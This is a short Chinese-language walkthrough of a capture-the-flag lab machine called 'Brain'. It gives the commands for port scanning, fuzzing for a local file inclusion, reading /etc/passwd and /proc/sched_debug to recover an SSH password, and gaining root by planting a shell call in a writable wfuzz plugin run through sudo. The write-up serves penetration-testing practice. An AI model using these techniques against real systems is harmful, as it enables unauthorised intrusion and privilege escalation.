# 靶场搭建

下载:Brain

Nat,IP: 192.168.1.145

# 渗透过程

# 信息初收集

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 32:95:f9:20:44:d7:a1:d1:80:a8:d6:95:91:d5:1e:da (RSA)
|   256 07:e7:24:38:1d:64:f6:88:9a:71:23:79:b8:d8:e6:57 (ECDSA)
|_  256 58:a6:da:1e:0f:89:42:2b:ba:de:00:fc:71:78:3d:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)

首页莫名其妙,目录收集无果

FUZZ 参数: wfuzz -c -t 200 --hc=404 --hh=361 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt "http://192.168.1.145/index.php?FUZZ=/etc/passwd"

得到 include 参数

http://192.168.1.145/index.php?include=/etc/passwd ,得到了 ben 用户

http://192.168.1.145/index.php?include=/proc/sched_debug 得到了密码: B3nP4zz

/proc/sched_debug 是一个特殊的内核调度器调试接口,用于提供有关 Linux 内核调度器的详细信息。它允许用户和开发人员获取有关进程调度、CPU 负载、调度策略和其他与调度器相关的信息。通过读取 /proc/sched_debug 文件,用户可以深入了解系统中进程如何被调度以及调度器的行为。这对于调优系统性能和调试调度相关的问题非常有用。

ssh 上去,得到 ben 的 shell

# 提权

sudo -l 发现了 wfuzz 程序, -z 参数可以指定一个 py 脚本 payload。那写一个 py 文件,加载进去。

不行 - z 没法那么用,只能写入原有的,但是没有权限

查了一下可写的文件,发现: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py 可以写

在头部写入 bash:

import os
os.system("/bin/bash")

sudo wfuzz -c -z range 1-2 ,拿到了 root 权限